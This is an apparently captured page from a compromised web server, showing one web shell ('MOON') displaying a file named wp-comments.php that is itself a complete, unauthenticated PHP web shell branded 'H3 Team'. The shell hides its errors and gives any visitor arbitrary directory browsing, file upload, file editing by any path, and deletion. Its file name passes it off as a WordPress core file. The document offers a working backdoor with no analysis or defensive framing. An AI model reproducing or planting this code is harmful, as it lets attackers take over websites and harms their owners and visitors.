MOON
Server: Apache
System: Linux server1.studioinfinity.com.br 2.6.32-954.3.5.lve1.4.90.el6.x86_64 #1 SMP Tue Feb 21 12:26:30 UTC 2023 x86_64
User: artinside (517)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
$ pwd: /proc/self/root/home/artinside/www/
Upload Files
File: //proc/self/root/home/artinside/www/wp-comments.php
<?php
@error_reporting(0);
@ini_set('display_errors', 0);
@set_time_limit(0);
@ini_set('upload_max_filesize', '100M');
@ini_set('post_max_size', '100M');

// Auto-detect public_html
function detect_home() {
    // Try common paths
    if (isset($_SERVER['DOCUMENT_ROOT']) && is_dir($_SERVER['DOCUMENT_ROOT'])) {
        return $_SERVER['DOCUMENT_ROOT'];
    }
    $user = get_current_user();
    $try = ["/home/$user/public_html", "/home/$user/www", "/home/$user/htdocs", "/var/www/html"];
    foreach ($try as $p) {
        if (is_dir($p)) return $p;
    }
    return dirname(__FILE__);
}

$dir = isset($_GET['dir']) ? $_GET['dir'] : detect_home();
$dir = realpath($dir) ?: detect_home();

// Upload
$msg = '';
if (isset($_FILES['up']) && $_FILES['up']['error'] !== UPLOAD_ERR_NO_FILE) {
    $fname = basename($_FILES['up']['name']);
    $target = rtrim($dir, '/') . '/' . $fname;

    if ($_FILES['up']['error'] !== UPLOAD_ERR_OK) {
        $errors = [
            UPLOAD_ERR_INI_SIZE   => 'File terlalu besar (php.ini limit)',
            UPLOAD_ERR_FORM_SIZE  => 'File terlalu besar (form limit)',
            UPLOAD_ERR_PARTIAL    => 'File hanya terupload sebagian',
            UPLOAD_ERR_NO_TMP_DIR => 'Tidak ada folder tmp',
            UPLOAD_ERR_CANT_WRITE => 'Gagal menulis ke disk',
            UPLOAD_ERR_EXTENSION  => 'Upload dihentikan oleh extension',
        ];
        $err = isset($errors[$_FILES['up']['error']]) ? $errors[$_FILES['up']['error']] : 'Error #' . $_FILES['up']['error'];
        $msg = "<div style='color:red;text-align:center;'>&#10060; Upload gagal: $err</div>";
    } elseif (move_uploaded_file($_FILES['up']['tmp_name'], $target)) {
        @chmod($target, 0644);
        $msg = "<div style='color:lime;text-align:center;'>&#9989; Upload berhasil: " . htmlspecialchars($fname) . "</div>";
    } else {
        // Try alternative write method
        $data = file_get_contents($_FILES['up']['tmp_name']);
        if ($data !== false && file_put_contents($target, $data) !== false) {
            @chmod($target, 0644);
            $msg = "<div style='color:lime;text-align:center;'>&#9989; Upload berhasil (alt): " . htmlspecialchars($fname) . "</div>";
        } else {
            $msg = "<div style='color:red;text-align:center;'>&#10060; Upload gagal! Dir: $dir | Writable: " . (is_writable($dir) ? 'YES' : 'NO') . "</div>";
        }
    }
}

// Save Edit
if (isset($_POST['edit_file']) && isset($_POST['content'])) {
    $file = $_POST['edit_file'];
    if (file_put_contents($file, $_POST['content']) !== false) {
        $msg = "<div style='color:lime;text-align:center;'>&#9989; File berhasil di-edit: " . htmlspecialchars(basename($file)) . "</div>";
    } else {
        $msg = "<div style='color:red;text-align:center;'>&#10060; Gagal menulis file!</div>";
    }
}

// Delete
if (isset($_GET['del'])) {
    $f = rtrim($dir, '/') . '/' . basename($_GET['del']);
    if (file_exists($f) && @unlink($f)) {
        $msg = "<div style='color:lime;text-align:center;'>&#128465; File dihapus: " . htmlspecialchars(basename($f)) . "</div>";
    } else {
        $msg = "<div style='color:red;text-align:center;'>&#10060; Gagal menghapus: " . htmlspecialchars(basename($_GET['del'])) . "</div>";
    }
}

// Edit View
if (isset($_GET['edit'])) {
    $f = rtrim($dir, '/') . '/' . basename($_GET['edit']);
    if (file_exists($f)) {
        $content = htmlspecialchars(file_get_contents($f));
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Edit - <?= htmlspecialchars(basename($f)) ?></title>
</head>
<body style="background:#000;color:#ccc;font-family:monospace;padding:40px;text-align:center;">
    <h2 style="color:#f0f;">&#9997; Edit: <?= htmlspecialchars(basename($f)) ?></h2>
    <form method="POST" action="?dir=<?= urlencode($dir) ?>">
        <input type="hidden" name="edit_file" value="<?= htmlspecialchars($f) ?>">
        <textarea name="content" rows="30"
            style="width:90%;max-width:1000px;background:#111;color:#0f0;border:1px solid #444;padding:12px;font-family:monospace;font-size:13px;"><?= $content ?></textarea><br><br>
        <input type="submit" value="&#128190; Save" style="padding:10px 30px;background:#222;color:#0f0;border:1px solid #0f0;cursor:pointer;font-size:14px;">
    </form>
    <br><a href="?dir=<?= urlencode($dir) ?>" style="color:#0af;">&#11013; Kembali</a>
    <div style="margin-top:60px;font-size:13px;color:#555;">
        Powered by <strong style="color:#f0f;">H3 Team</strong> <?= date('Y') ?>
    </div>
</body>
</html>
<?php
        exit;
    } else {
        $msg = "<div style='color:red;text-align:center;'>&#10060; File tidak ditemukan</div>";
    }
}

$files = @scandir($dir) ?: [];
$dirEnc = urlencode($dir);
$parentDir = urlencode(dirname($dir));
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>H3 Lite</title>
</head>
<body style="background:#111;color:#ccc;font-family:monospace;text-align:center;padding:30px;">
    <h2 style="color:#f0f;">&#128194; File Manager - H3 Team</h2>
    <h4 style="color:#888;">&#128193; <?= htmlspecialchars($dir) ?></h4>
    <?= $msg ?>

    <!-- Upload -->
    <form method="POST" action="?dir=<?= $dirEnc ?>" enctype="multipart/form-data" style="margin:15px 0;">
        <input type="file" name="up">
        <input type="submit" value="Upload" style="padding:5px 15px;background:#222;color:#ccc;border:1px solid #555;cursor:pointer;">
    </form>

    <!-- Parent Directory -->
    <?php if ($dir !== '/'): ?>
    <a href="?dir=<?= $parentDir ?>" style="color:#ff0;font-size:13px;">&#11014; Parent Directory</a>
    <?php endif; ?>

    <!-- File Table -->
    <div style="display:flex;justify-content:center;margin-top:15px;">
    <table border="1" cellpadding="8" cellspacing="0" style="background:#1a1a1a;border-color:#333;min-width:500px;">
        <tr style="background:#222;">
            <th style="color:#ccc;">Nama</th>
            <th style="color:#ccc;">Size</th>
            <th style="color:#ccc;">Aksi</th>
        </tr>
<?php
foreach ($files as $fn) {
    if ($fn === '.' || $fn === '..') continue;
    $fullpath = rtrim($dir, '/') . '/' . $fn;
    $enc = urlencode($fn);
    $isDir = is_dir($fullpath);
    $size = $isDir ? '-' : @filesize($fullpath);
    if (!$isDir && $size !== false) {
        if ($size > 1048576) $size = round($size / 1048576, 1) . ' MB';
        elseif ($size > 1024) $size = round($size / 1024, 1) . ' KB';
        else $size = $size . ' B';
    }
    $nameColor = $isDir ? '#0ff' : '#0f0';
    echo "<tr>";
    echo "<td style='color:$nameColor;text-align:left;'>" . ($isDir ? '&#128193; ' : '') . htmlspecialchars($fn) . "</td>";
    echo "<td style='color:#888;font-size:12px;'>$size</td>";
    echo "<td>";
    if ($isDir) {
        echo "<a href='?dir=" . urlencode($fullpath) . "' style='color:#0ff;'>Buka</a>";
    } else {
        echo "<a href='?dir=$dirEnc&edit=$enc' style='color:#0af;'>Edit</a> | ";
        echo "<a href='?dir=$dirEnc&del=$enc' onclick='return confirm(\"Hapus $fn?\")' style='color:#f55;'>Delete</a>";
    }
    echo "</td></tr>";
}
if (count($files) <= 2) {
    echo "<tr><td colspan='3' style='color:#666;'>Folder kosong</td></tr>";
}
?>
    </table>
    </div>

    <!-- Server Info -->
    <div style="margin-top:30px;font-size:12px;color:#555;">
        <?= php_uname() ?><br>
        PHP <?= phpversion() ?> | Safe Mode: <?= @ini_get('safe_mode') ? 'ON' : 'OFF' ?> |
        Writable: <?= is_writable($dir) ? '<span style="color:lime">YES</span>' : '<span style="color:red">NO</span>' ?>
    </div>

    <div style="margin-top:20px;font-size:13px;color:#555;">
        Powered by <strong style="color:#f0f;">H3 Team</strong> <?= date('Y') ?>
    </div>
</body>
</html>
@ Telegram